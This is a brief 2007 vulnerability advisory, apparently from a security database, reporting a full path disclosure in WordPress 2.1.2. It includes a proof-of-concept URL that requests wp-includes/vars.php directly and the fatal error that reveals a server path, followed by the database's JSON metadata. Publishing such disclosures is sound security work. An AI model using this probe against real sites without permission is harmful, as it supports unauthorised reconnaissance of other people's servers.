Product : Wordpress 2.1.2
Vulnerability Details :
All the sites running on the latest version of wordpress 2.1.2 are exposed to a full path disclosure vulnerability.
Proof of Concept:
http://www.anysite.com/Path_to_wordpress/wp-includes/vars.php
Error Returned:
Fatal error: Call to undefined function get_option() in /home/santoshp/public_html/wp-includes/vars.php on line 92
Location:
www.indiaesecure.com/exploits.htm/wp212.txt
{"id": "SECURITYVULNS:DOC:16484", "bulletinFamily": "software", "title": "Path Disclosure - Wordpress 2.1.2", "description": "Product : Wordpress 2.1.2\r\nVulnerability Details :\r\nAll the sites running on the latest version of wordpress 2.1.2 are exposed to a full path disclosure vulnerability.\r\n\r\nProof of Concept:\r\nhttp://www.anysite.com/Path_to_wordpress/wp-includes/vars.php\r\n\r\nError Returned:\r\n\r\nFatal error: Call to undefined function get_option() in /home/santoshp/public_html/wp-includes/vars.php on line 92\r\n\r\nLocation:\r\nwww.indiaesecure.com/exploits.htm/wp212.txt", "published": "2007-03-27T00:00:00", "modified": "2007-03-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16484", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:21", "edition": 1, "viewCount": 28, "enchantments": {"score": {"value": 1.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7474"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7474"]}]}, "exploitation": null, "vulnersScore": 1.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645596568}}
Path Disclosure - Wordpress 2.1.2